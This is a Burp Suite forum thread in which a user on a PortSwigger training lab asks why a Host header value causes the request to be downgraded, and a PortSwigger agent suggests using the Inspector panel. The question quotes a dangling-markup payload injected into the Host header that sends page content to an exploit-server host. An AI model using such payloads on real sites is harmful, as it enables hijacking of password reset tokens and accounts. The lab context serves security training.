Burp Suite User Forum

Login to post

Adding Space in Header Kettles Request

Lewis | Last updated: May 26, 2023 12:03PM UTC

Hey, I'm going through the following lab: Password reset poisoning via dangling markup Whenever I add a space to my Host header, Burp Suite kettles my request which causes the CSRF token to not be sent along correctly giving me an HTTP 400 response "Missing parameter 'csrf'" According to the explanation of kettling at https://portswigger.net/burp/documentation/desktop/http2 this header value should not cause the request to be kettled: Host: 0ac50042037df6f081b8393b00dd00b6.web-security-academy.net:'<img src="exploit-0a4c00b30384f625812c38d8017e00fa.exploit-server.net/?src= Am I misunderstanding something here?

Michelle, PortSwigger Agent | Last updated: May 30, 2023 12:17PM UTC

Thanks for getting in touch. We'll take a look through the lab and be in touch soon.

Michelle, PortSwigger Agent | Last updated: May 31, 2023 02:33PM UTC

Hi In step 7, changing the host header using the Inspector panel rather than directly in the Message Editor should allow the request to be sent successfully. Please let me know if this helps.

You need to Log in to post a reply. Or register here, for free.